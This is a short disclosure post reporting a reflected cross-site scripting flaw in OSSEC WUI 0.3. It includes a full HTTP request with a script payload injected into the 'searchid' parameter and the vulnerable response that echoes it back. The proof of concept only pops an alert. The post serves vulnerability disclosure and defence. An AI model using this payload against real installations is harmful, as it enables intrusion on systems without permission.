OSSEC WUI 0.3 Cross Site Scripting

Posted on 28 September 2012

Hello All,

Just to report xss in ossec-wui 0.3

Request:
----
POST /ossec-wui/index.php?f=s HTTP/1.1
Host: 172.16.0.12
Content-Length: 267

monitoring=0&initdate=2012-09-24+13%3A41&finaldate=2012-09-24+17%3A41&level=7&grouppattern=ALL&strpattern=test&logpattern=ALL&srcippattern=&userpattern=test2&locationpattern=&rulepattern=&max_alerts_per_page=1000&search=<
Prev&searchid="><script>alert("514")</script>
-----

Response:
-----
 value="1000" class="formText" /></td></tr>
 <tr><td>
 <input type="submit" name="search" value="Search" class="button" />
</td></tr></table>
 <input type="hidden" name="searchid"
value=""><script>alert("514")</script>" />
 </form><br /> <br />
----

--
Alejandro Ramos
http://twitter.com/aramosf

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

PHP Remote Code Execution
AEGON LIFE 1.0 SQL Injection
AEGON LIFE 1.0 Remote Code Execution
AEGON LIFE 1.0 Cross Site Scripting
Premium Support Tickets For WHMCS 1.2.10 Cross Site Scripting

Last 20